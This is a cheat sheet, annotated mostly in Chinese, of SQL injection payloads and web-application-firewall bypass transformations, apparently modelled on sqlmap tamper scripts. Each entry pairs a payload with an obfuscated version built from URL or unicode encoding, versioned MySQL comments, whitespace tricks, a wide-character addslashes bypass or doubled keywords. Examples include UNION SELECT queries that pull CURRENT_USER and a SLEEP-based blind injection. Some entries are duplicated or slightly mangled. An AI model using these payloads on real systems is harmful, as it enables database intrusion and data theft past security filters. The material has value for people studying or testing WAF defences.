#用utf8代替引号
("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

#like 代替等号
SELECT * FROM users WHERE id=1
SELECT * FROM users WHERE id LIKE 1


#绕过过滤‘=’ 替换空格字符（”），（’ C ‘）后跟一个破折号注释，一个随机字符串和一个新行（’ n’）
('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'


#绕过过滤’>’ ,用GREATEST替换大于号。
('1 AND A &gt; B')
'1 AND GREATEST(A,B+1)=A'(%%271%%20AND%%20GREATEST(A,B+1)=A%%27)

#空格替换为#号 随机字符串 以及换行符
1 AND 9227=9227
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227


#绕过过滤双引号，替换字符和双引号。
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'


#当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

#空格替换为 #号 以及更多随机字符串 换行符
1 AND 9227=9227
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227


#在有效负荷结束位置加载零字节字符编码
('1 AND 1=1')
'1 AND 1=1%00'

#绕过对 IFNULL 过滤。替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

#空格替换为其它空符号
SELECT id FROM users
SELECT%08id%02FROM%0Fusers

#用base64编码替换
("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

#替换空格
('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'


#过滤空格，包含完整的查询版本注释
('1 AND 2&gt;1--')
'1 /*!30874AND 2&gt;1*/--'


#空格替换其它空白符号(mysql)
SELECT id FROM users
SELECT%0Bid%0BFROM%A0users


#用between替换大于号（>）
('1 AND A &gt; B--')
'1 AND A NOT BETWEEN 0 AND B--'


#包含了完整的查询与零版本注释
('1 AND 2&gt;1--')
'1 /*!00000AND 2&gt;1*/--'

#替换空格字符（”）（’ C ‘）后跟一个破折号注释一个新行（’ n’）
('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'


#围绕SQL关键字添加多个空格
('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

#用+替换空格
('SELECT id FROM users')
'SELECT+id+FROM+users'


#代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like
('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'


#双重查询语句。取代predefined SQL关键字with表示 suitable for替代（例如  .replace（“SELECT”、””)） filters
('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'

#代替空格字符（“”）从一个随机的空白字符可选字符的有效集
('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'


#asp允许每个字符前面添加一个%号
SELECT FIELD FROM TABLE
%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

#追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

#双url编码(不处理以编码的)
SELECT FIELD FROM%20TABLE
%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

#替换UNION ALL SELECT UNION SELECT
('-1 UNION ALL SELECT')
'-1 UNION SELECT'

#url编码
SELECT FIELD FROM%20TABLE
%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

#随机大小写
INSERT
InsERt

#宽字符绕过 GPC  addslashes
1′ AND 1=1
1%bf%27 AND 1=1C%20


#用/**/分割sql关键字
‘INSERT’ becomes ‘IN//S//ERT’

#Encloses each non-function keyword with versioned MySQL comment
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

#字符串 unicode 编码
SELECT FIELD%20FROM TABLE
%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

#追加特制的字符串
('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"

#注释绕过
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

#Replaces space character (‘ ‘) with comments ‘/**/’
SELECT id FROM users
SELECT//id//FROM/**/users

#关键字前加注释
value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa
value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa



